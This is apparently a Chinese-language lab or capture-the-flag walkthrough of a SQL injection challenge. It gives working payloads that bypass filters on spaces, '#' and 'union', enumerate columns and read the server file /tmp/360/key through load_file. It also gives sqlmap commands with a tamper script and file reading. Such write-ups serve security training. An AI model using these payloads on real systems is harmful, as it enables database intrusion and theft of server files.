1、?id=1'

2、?id=1'and'1'='1

1、使用 order by 判斷語句模板列數

發(fā)現語句在執(zhí)行中過濾了空格還過濾了“#”

執(zhí)行失敗：

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

執(zhí)行成功：

?id=1')and'1'='1'order/**/by/**/3%23

解釋：

?id=1')and'1'='1'order/**/by/**/3%23

• ')用來閉合前面的語句，order/**/by/**/3%23（order by 3）用來查詢模板列數

• /**/（用注釋的方式代替空格），%23（使用url編碼代替#）

2、判斷出語句模板有4個字段

回顯正常：

?id=1')and'1'='1'order/**/by/**/4%23? #執(zhí)行 order by 4 的時候回顯正常

回顯不正常：

?id=1')and'1'='1'order/**/by/**/5%23? #執(zhí)行 order by 5 的時候回顯不正常

回顯不正常：

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路：使用 and 1=2 報錯找回顯點

回顯正常：

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路：由于過濾了union，所以這里使用雙寫的方式經行過濾繞過，并且判斷出回顯點有3個（語句模板中的2，3，4位置均為回顯點）

執(zhí)行成功：

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解釋：

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

• database() #當前數據庫名

• user() #當前數據庫用戶名

• load_file('/tmp/360/key') #讀取服務器文件

1、由于前面判斷出了此題注入點存在過濾空格的情況，所以在使用sqlmap的時候需要指定腳本（用注釋/**/替換空格字符' '：--tamper "space2comment.py"）運行

命令：

• python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py腳本所以使用python執(zhí)行，用kali就直接用第二條命令就行
• sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令：

• python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?#我用的是sqlmap.py腳本所以使用python執(zhí)行，用kali就直接用第二條命令就行
• sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?